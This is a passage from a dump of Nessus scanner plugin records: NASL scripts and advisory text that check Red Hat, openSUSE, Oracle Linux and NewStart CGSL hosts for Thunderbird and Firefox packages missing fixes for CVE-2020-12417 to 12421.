(CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/296.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/416.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12419\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12420\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-12421\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2966\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1853018\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected thunderbird package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(200, 296, 416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_6_client': [\n 'rhel-6-desktop-debug-rpms',\n 'rhel-6-desktop-fastrack-debug-rpms',\n 'rhel-6-desktop-fastrack-rpms',\n 'rhel-6-desktop-fastrack-source-rpms',\n 'rhel-6-desktop-optional-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-rpms',\n 'rhel-6-desktop-optional-fastrack-source-rpms',\n 'rhel-6-desktop-optional-rpms',\n 'rhel-6-desktop-optional-source-rpms',\n 'rhel-6-desktop-rpms',\n 'rhel-6-desktop-source-rpms'\n ],\n 'enterprise_linux_6_server': [\n 'rhel-6-for-system-z-debug-rpms',\n 'rhel-6-for-system-z-fastrack-debug-rpms',\n 'rhel-6-for-system-z-fastrack-rpms',\n 'rhel-6-for-system-z-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-rpms',\n 'rhel-6-for-system-z-optional-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-rpms',\n 'rhel-6-for-system-z-optional-source-rpms',\n 'rhel-6-for-system-z-rpms',\n 'rhel-6-for-system-z-source-rpms',\n 'rhel-6-server-debug-rpms',\n 'rhel-6-server-fastrack-debug-rpms',\n 'rhel-6-server-fastrack-rpms',\n 'rhel-6-server-fastrack-source-rpms',\n 'rhel-6-server-optional-debug-rpms',\n 'rhel-6-server-optional-fastrack-debug-rpms',\n 'rhel-6-server-optional-fastrack-rpms',\n 'rhel-6-server-optional-fastrack-source-rpms',\n 'rhel-6-server-optional-rpms',\n 'rhel-6-server-optional-source-rpms',\n 'rhel-6-server-rpms',\n 'rhel-6-server-source-rpms',\n 'rhel-ha-for-rhel-6-server-debug-rpms',\n 'rhel-ha-for-rhel-6-server-rpms',\n 'rhel-ha-for-rhel-6-server-source-rpms',\n 'rhel-lb-for-rhel-6-server-debug-rpms',\n 'rhel-lb-for-rhel-6-server-rpms',\n 'rhel-lb-for-rhel-6-server-source-rpms',\n 'rhel-rs-for-rhel-6-server-debug-rpms',\n 'rhel-rs-for-rhel-6-server-rpms',\n 'rhel-rs-for-rhel-6-server-source-rpms',\n 'rhel-scalefs-for-rhel-6-server-debug-rpms',\n 'rhel-scalefs-for-rhel-6-server-rpms',\n 'rhel-scalefs-for-rhel-6-server-source-rpms'\n ],\n 'enterprise_linux_6_workstation': [\n 'rhel-6-workstation-debug-rpms',\n 'rhel-6-workstation-fastrack-debug-rpms',\n 'rhel-6-workstation-fastrack-rpms',\n 'rhel-6-workstation-fastrack-source-rpms',\n 'rhel-6-workstation-optional-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-rpms',\n 'rhel-6-workstation-optional-fastrack-source-rpms',\n 'rhel-6-workstation-optional-rpms',\n 'rhel-6-workstation-optional-source-rpms',\n 'rhel-6-workstation-rpms',\n 'rhel-6-workstation-source-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-debug-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:2966');\n}\n\npkgs = [\n {'reference':'thunderbird-68.10.0-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'thunderbird-68.10.0-1.el6_10', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'thunderbird-68.10.0-1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'thunderbird');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-23T03:48:10", "description": "This update for MozillaThunderbird to version 68.10.0 ESR fixes the\nfollowing issues :\n\n - CVE-2020-12417: Memory corruption due to missing\n sign-extension for ValueTags on ARM64 (bsc#1173576).\n\n - CVE-2020-12418: Information disclosure due to\n manipulated URL object (bsc#1173576).\n\n - CVE-2020-12419: Use-after-free in nsGlobalWindowInner\n (bsc#1173576).\n\n - CVE-2020-12420: Use-After-Free when trying to connect to\n a STUN server (bsc#1173576).\n\n - CVE-2020-12421: Add-On updates did not respect the same\n certificate trust rules as software updates\n (bsc#1173576).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 2, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-20T00:00:00", "title": "openSUSE Security Update : MozillaThunderbird (openSUSE-2020-967)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-20T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource", "p-cpe:/a:novell:opensuse:MozillaThunderbird", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common"], "id": "OPENSUSE-2020-967.NASL", "href": "https://www.tenable.com/plugins/nessus/138742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-967.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138742);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/22\");\n\n script_cve_id(\"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12421\");\n\n script_name(english:\"openSUSE Security Update : MozillaThunderbird (openSUSE-2020-967)\");\n script_summary(english:\"Check for the openSUSE-2020-967 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for MozillaThunderbird to version 68.10.0 ESR fixes the\nfollowing issues :\n\n - CVE-2020-12417: Memory corruption due to missing\n sign-extension for ValueTags on ARM64 (bsc#1173576).\n\n - CVE-2020-12418: Information disclosure due to\n manipulated URL object (bsc#1173576).\n\n - CVE-2020-12419: Use-after-free in nsGlobalWindowInner\n (bsc#1173576).\n\n - CVE-2020-12420: Use-After-Free when trying to connect to\n a STUN server (bsc#1173576).\n\n - CVE-2020-12421: Add-On updates did not respect the same\n certificate trust rules as software updates\n (bsc#1173576).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173576\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected MozillaThunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-68.10.0-lp151.2.44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-debuginfo-68.10.0-lp151.2.44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-debugsource-68.10.0-lp151.2.44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-translations-common-68.10.0-lp151.2.44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"MozillaThunderbird-translations-other-68.10.0-lp151.2.44.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaThunderbird / MozillaThunderbird-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T17:30:51", "description": "From Red Hat Security Advisory 2020:2828 :\n\nThe remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:2828 advisory.\n\n - Mozilla: Memory corruption due to missing sign-extension\n for ValueTags on ARM64 (CVE-2020-12417)\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-09T00:00:00", "title": "Oracle Linux 8 : firefox (ELSA-2020-2828)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-09T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:firefox", "cpe:/o:oracle:linux:8"], "id": "ORACLELINUX_ELSA-2020-2828.NASL", "href": "https://www.tenable.com/plugins/nessus/138246", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2828 and \n# Oracle Linux Security Advisory ELSA-2020-2828 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138246);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/31\");\n\n script_cve_id(\n \"CVE-2020-12417\",\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n script_xref(name:\"RHSA\", value:\"2020:2828\");\n script_xref(name:\"IAVA\", value:\"2020-A-0287-S\");\n\n script_name(english:\"Oracle Linux 8 : firefox (ELSA-2020-2828)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2020:2828 :\n\nThe remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:2828 advisory.\n\n - Mozilla: Memory corruption due to missing sign-extension\n for ValueTags on ARM64 (CVE-2020-12417)\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2020-July/010108.html\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"firefox-68.10.0-1.0.1.el8_2\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T04:06:36", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has firefox packages installed that are affected\nby multiple vulnerabilities:\n\n - Due to confusion about ValueTags on JavaScript Objects, an object may pass through the type barrier,\n resulting in memory corruption and a potentially exploitable crash. *Note: this issue only affects Firefox\n on ARM64 platforms.* This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird <\n 68.10.0. (CVE-2020-12417)\n\n - Manipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process\n memory to malicious JavaScript. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and\n Thunderbird < 68.10.0. (CVE-2020-12418)\n\n - When processing callbacks that occurred during window flushing in the parent process, the associated\n window may die; causing a use-after-free condition. This could have led to memory corruption and a\n potentially exploitable crash. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and\n Thunderbird < 68.10.0. (CVE-2020-12419)\n\n - When trying to connect to a STUN server, a race condition could have caused a use-after-free of a pointer,\n leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR <\n 68.10, Firefox < 78, and Thunderbird < 68.10.0. (CVE-2020-12420)\n\n - When performing add-on updates, certificate chains terminating in non-built-in-roots were rejected (even\n if they were legitimately added by an administrator.) This could have caused add-ons to become out-of-date\n silently without notification to the user. This vulnerability affects Firefox ESR < 68.10, Firefox < 78,\n and Thunderbird < 68.10.0. (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : firefox Multiple Vulnerabilities (NS-SA-2020-0081)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-12-09T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2020-0081_FIREFOX.NASL", "href": "https://www.tenable.com/plugins/nessus/143966", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2020-0081. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143966);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/02\");\n\n script_cve_id(\n \"CVE-2020-12417\",\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : firefox Multiple Vulnerabilities (NS-SA-2020-0081)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has firefox packages installed that are affected\nby multiple vulnerabilities:\n\n - Due to confusion about ValueTags on JavaScript Objects, an object may pass through the type barrier,\n resulting in memory corruption and a potentially exploitable crash. *Note: this issue only affects Firefox\n on ARM64 platforms.* This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird <\n 68.10.0. (CVE-2020-12417)\n\n - Manipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process\n memory to malicious JavaScript. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and\n Thunderbird < 68.10.0. (CVE-2020-12418)\n\n - When processing callbacks that occurred during window flushing in the parent process, the associated\n window may die; causing a use-after-free condition. This could have led to memory corruption and a\n potentially exploitable crash. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and\n Thunderbird < 68.10.0. (CVE-2020-12419)\n\n - When trying to connect to a STUN server, a race condition could have caused a use-after-free of a pointer,\n leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR <\n 68.10, Firefox < 78, and Thunderbird < 68.10.0. (CVE-2020-12420)\n\n - When performing add-on updates, certificate chains terminating in non-built-in-roots were rejected (even\n if they were legitimately added by an administrator.) This could have caused add-ons to become out-of-date\n silently without notification to the user. This vulnerability affects Firefox ESR < 68.10, Firefox < 78,\n and Thunderbird < 68.10.0. (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2020-0081\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL firefox packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n 